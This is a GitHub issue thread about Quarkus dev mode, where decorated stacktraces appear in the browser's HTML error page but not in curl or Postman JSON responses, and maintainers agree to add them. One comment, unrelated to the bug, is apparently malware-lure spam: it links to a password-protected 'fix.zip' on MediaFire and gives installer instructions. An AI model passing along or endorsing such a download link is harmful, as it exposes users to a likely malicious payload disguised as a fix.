### ISSUE TITLE
Decorated stacktraces in dev mode are not provided when using tools like curl or postman

### ISSUE THREAD

**Issue by rsvoboda** [quarkusio/quarkus#42870]
### Describe the bug

Decorated stacktraces in dev mode are not provided when using tools like curl or postman
Decorated stacktraces were introduced in https://github.com/quarkusio/quarkus/pull/37034 /cc @geoand 

When using browser I can see the code example
<img width="1252" alt="Screenshot 2024-08-29 at 16 35 15" src="https://github.com/user-attachments/assets/5d217211-5c27-45f0-905e-8d1e2a804dae">

Postman / curl response doesn't have these details
<img width="1494" alt="Screenshot 2024-08-29 at 16 34 40" src="https://github.com/user-attachments/assets/e9e8a91d-e644-4895-a509-739b9216811f">

I'm filing this as a bug because I think the details provided by the "error" page should be consistent.
Feel free to change this to enhancement if you have an opinion about that.

### Expected behavior

Decorated stacktraces in dev mode are also provided when using tools like curl or postman

### Actual behavior

Decorated stacktraces in dev mode are not provided when using tools like curl or postman

### How to Reproduce?

 - Get app from https://code.quarkus.io/
 - Run it in dev mode
 - Adjust `GreetingResource` to through NPE, e.g. `String foo = null; return "Hello from Quarkus REST" + foo.length();`
 - Hit http://localhost:8080/hello in postman or curl

### Output of `uname -a` or `ver`

macOS

### Output of `java -version`

Java 21

### Quarkus version or git rev

Quarkus 3.14.1

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by geoand** [comment]
cc @phillip-kruger who has been working on this lately

**Comment by phillip-kruger** [comment]
Yea the decoration is only added to the html response. curl gets json (by default). I'll add it to the json and text response too

**Comment by phillip-kruger** [comment]
We should probably make curl default be txt (same as the 404 page https://github.com/quarkusio/quarkus/pull/41989)
